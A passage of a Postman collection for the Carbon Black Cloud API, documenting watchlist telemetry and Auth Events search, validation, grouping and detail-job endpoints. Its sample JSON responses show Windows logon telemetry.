Telemetry","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"watchlist_ids\": [\n        \"6ea4SIyJRBCupAysaAeekA\"\n    ],\n    \"intervals\": [\n        1440,\n        10080,\n        43200\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists/{{cb_watchlist_id}}/telemetry"},"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":null}],"_postman_id":"e3483356-46a0-4486-ba8d-fc5f4c314a63"},{"name":"⚠️ Get Watchlist Telemetry","id":"0c908672-340e-4ba3-ad86-ed0c200b57be","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists/{{cb_watchlist_id}}/telemetry","description":"<p>This API is deprecated and replaced with a POST that takes the list of watchlist ids in the body.</p>\n<p>Returns hits and executions for watchlists over the provided intervals. By default will return telemetry aggregated over the past hour. Include comma seperated list of intervals in minutes as query param <code>intervals</code> to aggregate over different ranges, eg intervals=1440,10080,43200.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/watchlist-api/#get-watchlist-telemetry\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists","{{cb_watchlist_id}}","telemetry"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"0c908672-340e-4ba3-ad86-ed0c200b57be"}],"id":"6a52404c-d56c-4376-a242-dc196e08ae0a","_postman_id":"6a52404c-d56c-4376-a242-dc196e08ae0a","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Auth Events","item":[{"name":"Events Search","item":[{"name":"Start Auth Events Search Job","id":"9210ae1a-bebd-4c0f-aea3-2616c317b4f1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"query\": \"auth_username:SYSTEM\",\n  \"time_range\": {\n    \"window\": \"-7d\"\n  }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/search_jobs","description":"<p>Creates an Auth Events Search job. The results for the search job may be requested using the <code>job_id</code> returned. This route will not request facets.</p>\n<p>RBAC Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ, CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p>Request Schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"collapse\": ,\n  \"criteria\": {\n    \"additionalProp1\": [ { \"\": \"\"} ]\n  },\n  \"exclusions\": {\n    \"additionalProp1\": [ { \"\": \"\"} ]\n  },\n  \"fields\": [ \"\" ],\n  \"query\": \"\",\n  \"rows\": ,\n  \"sort\": [\n    {\n      \"field\": \"\",\n      \"order\": \"\"\n    }\n  ],\n  \"start\": ,\n  \"time_range\": {\n    \"end\": \"\",\n    \"start\": \"\",\n    \"window\": \"\"\n  }\n}\n</code></pre>\n<p><a href=\"https://desktop.postman.com/?desktopVersion=9.31.0&amp;userId=16331452&amp;teamId=1486705\">See Documentation about the APIs</a></p>\n<p><a href=\"https://desktop.postman.com/?desktopVersion=9.31.0&amp;userId=16331452&amp;teamId=1486705\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","auth_events","search_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"a80541c6-c1e9-4d71-9775-14951aaa2961","name":"Start Auth Events Search Job","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n  \"query\": \"auth_username:SYSTEM\",\n  \"time_range\": {\n    \"window\": \"-3d\"\n  }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/search_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"1efc2a3d-f1b2-46fd-b1a1-ded953030c11-sqs\"\n}"}],"_postman_id":"9210ae1a-bebd-4c0f-aea3-2616c317b4f1"},{"name":"Get Auth Events Search Job Results","id":"470829f6-867e-467f-8978-758de2f0c8df","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/search_jobs/{{cb_job_id}}/results","description":"<p>Retrieves the auth events search results for a given job_id. Results will be sorted based on the sort parameter used when starting the search. Results may be available immediately but will be complete once the job finishes, as this call is asynchronous. The job will be complete when contacted == completed in the response.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api/#get-auth-events-search-job-results\">See Documentation about the APIs</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","auth_events","search_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"c8f7e197-282a-43e8-9039-840f1e23ec4a","name":"Get Auth Events Search Job Results","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/search_jobs/{{cb_job_id}}/results"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n  \"results\": [\n    {\n      \"auth_domain_name\": \"NT AUTHORITY\",\n      \"auth_event_action\": \"LOGON_SUCCESS\",\n      \"auth_remote_device\": \"-\",\n      \"auth_remote_port\": 0,\n      \"auth_username\": \"SYSTEM\",\n      \"backend_timestamp\": \"2023-01-13T17:19:01.013Z\",\n      \"childproc_count\": 0,\n      \"crossproc_count\": 48,\n      \"device_group_id\": 0,\n      \"device_id\": 17686136,\n      \"device_name\": \"test_name\",\n      \"device_policy_id\": 20622246,\n      \"device_timestamp\": \"2023-01-13T17:17:45.322Z\",\n      \"event_id\": \"DA9E269E-421D-469D-A212-9062888A02F4\",\n      \"filemod_count\": 3,\n      \"ingress_time\": 1673630293265,\n      \"modload_count\": 1,\n      \"netconn_count\": 35,\n      \"org_id\": \"ABCD1234\",\n      \"parent_guid\": \"ABCD1234-010dde78-00000260-00000000-1d9275de5e5b262\",\n      \"parent_pid\": 608,\n      \"process_guid\": \"ABCD1234-010dde78-00000308-00000000-1d9275de6169dd7\",\n      \"process_hash\": [\n        \"15a556def233f112d127025ab51ac2d3\",\n        \"362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427\"\n      ],\n      \"process_name\": \"c:\\\\windows\\\\system32\\\\lsass.exe\",\n      \"process_pid\": [\n        776\n      ],\n      \"process_username\": [\n        \"NT AUTHORITY\\\\SYSTEM\"\n      ],\n      \"regmod_count\": 11,\n      \"scriptload_count\": 0,\n      \"windows_event_id\": 4624\n    }\n  ],\n  \"num_found\": 175,\n  \"num_available\": 175,\n  \"approximate_unaggregated\": 175,\n  \"num_aggregated\": 175,\n  \"contacted\": 12,\n  \"completed\": 12\n}"}],"_postman_id":"470829f6-867e-467f-8978-758de2f0c8df"},{"name":"Get Auth Events Search Suggestions","id":"b5148ac4-d5c0-4c97-b307-732ef4d1a93f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{org_key}/auth_events/search_suggestions?suggest.q=auth","description":"<p>Returns suggestions for an Auth Events Search based on fields in the organization’s system. Will return field names if the “suggest.q” parameter does not yet contain a colon and will return no suggestion otherwise.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api/#get-auth-events-search-suggestions\">See Documentation about the APIs</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{org_key}","auth_events","search_suggestions"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>The query to generate suggestions for</p>\n","type":"text/plain"},"key":"suggest.q","value":"auth"},{"disabled":true,"description":{"content":"<p>The number of suggestions to return, default 50</p>\n","type":"text/plain"},"key":"suggest.count","value":""}],"variable":[]}},"response":[{"id":"4ae94090-2073-4260-a201-1adf5b302403","name":"Get Auth Events Search Suggestions","originalRequest":{"method":"GET","header":[],"url":{"raw":"{{cb_url}}/api/investigate/v2/orgs/{org_key}/auth_events/search_suggestions?suggest.q=auth","host":["{{cb_url}}"],"path":["api","investigate","v2","orgs","{org_key}","auth_events","search_suggestions"],"query":[{"key":"suggest.q","value":"auth","description":"The query to generate suggestions for"},{"key":"suggest.count","value":null,"description":"The number of suggestions to return, default 50","disabled":true}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"suggestions\": [\n        {\n            \"term\": \"auth_cleartext_credentials_logon\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_daemon_logon\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_domain_name\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_elevated_token_logon\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_event_action\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_failed_logon_count\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_failure_status\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_failure_sub_status\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_interactive_logon\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_logon_id\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_logon_type\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_privileges\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_remote_device\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_remote_ipv4\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_remote_ipv6\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_remote_location\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_remote_logon\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_remote_port\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_restricted_admin_logon\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_user_id\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_user_principal_name\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_username\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        },\n        {\n            \"term\": \"auth_virtual_account_logon\",\n            \"weight\": 350,\n            \"required_skus_all\": [\n                \"auth\"\n            ],\n            \"required_skus_some\": []\n        }\n    ]\n}"}],"_postman_id":"b5148ac4-d5c0-4c97-b307-732ef4d1a93f"},{"name":"Get Auth Events Search Validation","id":"fb4a149d-c931-4e46-91b8-bd9aa38b1d31","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/search_validation?q=\"(auth_username:Administrator)AND(device_name:test)\"","description":"<p>Returns the validation status of a given Auth Events query and potentially provides validation on how to fix invalid queries.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api/#get-auth-events-search-validation\">See Documentation about the APIs</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","auth_events","search_validation"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>The query to validate</p>\n","type":"text/plain"},"key":"q","value":"\"(auth_username:Administrator)AND(device_name:test)\""}],"variable":[]}},"response":[{"id":"f4f82433-5c33-499f-9d44-8961938afca2","name":"Get Auth Events Search Validation","originalRequest":{"method":"GET","header":[],"url":{"raw":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/search_validation?q=\"(auth_username:Administrator)AND(device_name:test)\"","host":["{{cb_url}}"],"path":["api","investigate","v2","orgs","{{cb_org_key}}","auth_events","search_validation"],"query":[{"key":"q","value":"\"(auth_username:Administrator)AND(device_name:test)\"","description":"The query to validate"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"valid\": true,\n    \"value_search_query\": true\n}"}],"_postman_id":"fb4a149d-c931-4e46-91b8-bd9aa38b1d31"},{"name":"Get Auth Events Search Group Results","id":"35f076c8-bd73-48e9-a048-4994e39206c7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"fields\": [\n        \"auth_username\"\n    ],\n    \"range\": {\n        \"duration\": \"-1w\"\n    },\n    \"rows\": 1\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/search_jobs/{{cb_job_id}}/group_results","description":"<p>Retrieves the auth events search group results for a given job_id. Results will be grouped based on the fields provided and/or by timestamp field duration.</p>\n<p>Results may be available immediately but will be complete once the job finishes, as this call is asynchronous. The job will be complete when contacted == completed in the response.</p>\n<p>Grouping with timestamp field<br />There are two different methods of grouping available when timestamp field is specified:</p>\n<p>Interval (default) - groups the events when the timestamp difference between two consecutive sorted events is less than the duration requested.<br />Example:<br />{ event1 = 10:00:00, event2 = 10:07:00, event3 = 10:21:00, event4 = 10:09:00, duration = 10m }<br />event1, event2, and event4 will be grouped into one since the time difference between sorted consecutive events is less than duration.</p>\n<p>Bucket - groups the documents in buckets of duration length, meaning the max time difference between the min and max within a group can be up to the duration.<br />Example:<br />{ event1 = 10:00:00, event2 = 10:07:00, event3 = 10:13:00, event4 = 10:21:00, duration = 10m }<br />event1 and event2 will be grouped into the first group since the time difference between them is less than duration, event3 will not be added to the first group it exceeds the max capacity of Bucket.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-body-schema\">Request Body Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"fields\": [\n    \"\"\n  ],\n  \"max_events_per_group\": ,\n  \"range\": {\n    \"duration\": \"\",\n    \"field\": \"\",\n    \"method\": \"\"\n  },\n  \"rows\": ,\n  \"start\": \n}\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api/#get-auth-events-search-group-results\">See Documentation about the APIs</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","auth_events","search_jobs","{{cb_job_id}}","group_results"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"8817b10e-2f37-400a-bb0e-4b972916e851","name":"Get Auth Events Search Group Results","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"fields\": [\n        \"auth_username\"\n    ],\n    \"range\": {\n        \"duration\": \"-1w\"\n    },\n    \"rows\": 1\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/search_jobs/{{cb_job_id}}/group_results"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"group_results\": [\n        {\n            \"group_key\": \"auth_username\",\n            \"group_value\": \"SYSTEM\",\n            \"group_start_timestamp\": \"2023-01-13T17:17:45.322Z\",\n            \"group_end_timestamp\": \"2023-01-13T17:17:45.322Z\",\n            \"results\": [\n                {\n                    \"auth_cleartext_credentials_logon\": false,\n                    \"auth_daemon_logon\": true,\n                    \"auth_domain_name\": \"NT AUTHORITY\",\n                    \"auth_elevated_token_logon\": true,\n                    \"auth_event_action\": \"LOGON_SUCCESS\",\n                    \"auth_failed_logon_count\": 0,\n                    \"auth_impersonation_level\": \"IMPERSONATION_LOCAL_ONLY\",\n                    \"auth_interactive_logon\": false,\n                    \"auth_key_length\": 0,\n                    \"auth_logon_id\": \"00000000-000003E7\",\n                    \"auth_logon_type\": 5,\n                    \"auth_package\": \"Negotiate\",\n                    \"auth_remote_device\": \"-\",\n                    \"auth_remote_logon\": false,\n                    \"auth_remote_port\": 0,\n                    \"auth_restricted_admin_logon\": false,\n                    \"auth_user_id\": \"S-1-5-18\",\n                    \"auth_username\": \"SYSTEM\",\n                    \"auth_virtual_account_logon\": false,\n                    \"backend_timestamp\": \"2023-01-13T17:18:36.195Z\",\n                    \"childproc_count\": 0,\n                    \"crossproc_count\": 48,\n                    \"device_external_ip\": \"52.116.18.136\",\n                    \"device_group_id\": 0,\n                    \"device_id\": 17686136,\n                    \"device_installed_by\": \"CBAWTD\\\\Administrator\",\n                    \"device_internal_ip\": \"192.168.231.164\",\n                    \"device_location\": \"UNKNOWN\",\n                    \"device_name\": \"test_name\",\n                    \"device_os\": \"WINDOWS\",\n                    \"device_os_version\": \"Windows 10 x64\",\n                    \"device_policy\": \"test-monitor\",\n                    \"device_policy_id\": 20622246,\n                    \"device_sensor_version\": \"3.9.0.2352\",\n                    \"device_target_priority\": \"MEDIUM\",\n                    \"device_timestamp\": \"2023-01-13T17:17:45.322Z\",\n                    \"document_guid\": \"e0Huct8dQRyYfOEHImpfkA\",\n                    \"event_id\": \"DA9E269E-421D-469D-A212-9062888A02F4\",\n                    \"event_report_code\": \"SUB_RPT_NONE\",\n                    \"filemod_count\": 3,\n                    \"ingress_time\": 1673630293265,\n                    \"modload_count\": 1,\n                    \"netconn_count\": 35,\n                    \"org_id\": \"ABCD1234\",\n                    \"parent_cmdline\": \"wininit.exe\",\n                    \"parent_cmdline_length\": 11,\n                    \"parent_effective_reputation\": \"TRUSTED_WHITE_LIST\",\n                    \"parent_effective_reputation_source\": \"IGNORE\",\n                    \"parent_guid\": \"ABCD1234-010dde78-00000260-00000000-1d9275de5e5b262\",\n                    \"parent_hash\": [\n                        \"9ef51c8ad595c5e2a123c06ad39fccd7\",\n                        \"268ca325c8f12e68b6728ff24d6536030aab6e05603d0179033b1e51d8476d86\"\n                    ],\n                    \"parent_name\": \"c:\\\\windows\\\\system32\\\\wininit.exe\",\n                    \"parent_pid\": 608,\n                    \"parent_publisher\": [\n                        \"Microsoft Windows Publisher\"\n                    ],\n                    \"parent_publisher_state\": [\n                        \"FILE_SIGNATURE_STATE_VERIFIED\",\n                        \"FILE_SIGNATURE_STATE_OS\",\n                        \"FILE_SIGNATURE_STATE_TRUSTED\",\n                        \"FILE_SIGNATURE_STATE_SIGNED\"\n                    ],\n                    \"parent_reputation\": \"TRUSTED_WHITE_LIST\",\n                    \"process_cmdline\": [\n                        \"C:\\\\Windows\\\\system32\\\\lsass.exe\"\n                    ],\n                    \"process_cmdline_length\": [\n                        29\n                    ],\n                    \"process_company_name\": \"Microsoft Corporation\",\n                    \"process_effective_reputation\": \"TRUSTED_WHITE_LIST\",\n                    \"process_effective_reputation_source\": \"IGNORE\",\n                    \"process_elevated\": true,\n                    \"process_file_description\": \"Local Security Authority Process\",\n                    \"process_guid\": \"ABCD1234-010dde78-00000308-00000000-1d9275de6169dd7\",\n                    \"process_hash\": [\n                        \"15a556def233f112d127025ab51ac2d3\",\n                        \"362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427\"\n                    ],\n                    \"process_integrity_level\": \"SYSTEM\",\n                    \"process_internal_name\": \"lsass.exe\",\n                    \"process_issuer\": [\n                        \"Microsoft Windows Production PCA 2011\"\n                    ],\n                    \"process_name\": \"c:\\\\windows\\\\system32\\\\lsass.exe\",\n                    \"process_original_filename\": \"lsass.exe\",\n                    \"process_pid\": [\n                        776\n                    ],\n                    \"process_privileges\": [\n                        \"SeIncreaseBasePriorityPrivilege\",\n                        \"SeCreateGlobalPrivilege\",\n                        \"SeChangeNotifyPrivilege\",\n                        \"SeCreateSymbolicLinkPrivilege\",\n                        \"SeDelegateSessionUserImpersonatePrivilege\",\n                        \"SeSystemProfilePrivilege\",\n                        \"SeDebugPrivilege\",\n                        \"SeProfileSingleProcessPrivilege\",\n                        \"SeLockMemoryPrivilege\",\n                        \"SeCreatePagefilePrivilege\",\n                        \"SeTimeZonePrivilege\",\n                        \"SeTcbPrivilege\",\n                        \"SeIncreaseWorkingSetPrivilege\",\n                        \"SeImpersonatePrivilege\",\n                        \"SeCreatePermanentPrivilege\",\n                        \"SeAuditPrivilege\"\n                    ],\n                    \"process_product_name\": \"Microsoft® Windows® Operating System\",\n                    \"process_product_version\": \"10.0.19041.906\",\n                    \"process_publisher\": [\n                        \"Microsoft Windows Publisher\"\n                    ],\n                    \"process_publisher_state\": [\n                        \"FILE_SIGNATURE_STATE_VERIFIED\",\n                        \"FILE_SIGNATURE_STATE_OS\",\n                        \"FILE_SIGNATURE_STATE_TRUSTED\",\n                        \"FILE_SIGNATURE_STATE_SIGNED\"\n                    ],\n                    \"process_reputation\": \"TRUSTED_WHITE_LIST\",\n                    \"process_sha256\": \"362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427\",\n                    \"process_start_time\": \"2023-01-13T14:47:02.982Z\",\n                    \"process_username\": [\n                        \"NT AUTHORITY\\\\SYSTEM\"\n                    ],\n                    \"regmod_count\": 11,\n                    \"scriptload_count\": 0,\n                    \"windows_event_id\": 4624\n                }\n            ],\n            \"total_events\": 1\n        }\n    ],\n    \"num_found\": 1,\n    \"num_available\": 1,\n    \"groups_num_available\": 1,\n    \"approximate_unaggregated\": 1,\n    \"num_aggregated\": 1,\n    \"contacted\": 11,\n    \"completed\": 11\n}"}],"_postman_id":"35f076c8-bd73-48e9-a048-4994e39206c7"}],"id":"00598760-62fe-4517-890d-5113530f3a7a","description":"<p>Search for Auth Events</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api/#events-search\">See Documentation about the API</a></p>\n","_postman_id":"00598760-62fe-4517-890d-5113530f3a7a","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Events Details","item":[{"name":"Start Auth Events Detail Job","id":"5bbcb954-46f0-4240-8747-cdcd9b92a549","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"alert_id\": \"{{cb_alert_id}}\",\n  \"event_ids\": [ \"{{cb_event_id}}\" ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/auth_events/detail_jobs","description":"<p>Creates an auth events detail job. The details will include information about the event that’s not normally accessible during a search. The results for the search job may be requested using the job ID returned.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema-body\">Request Schema 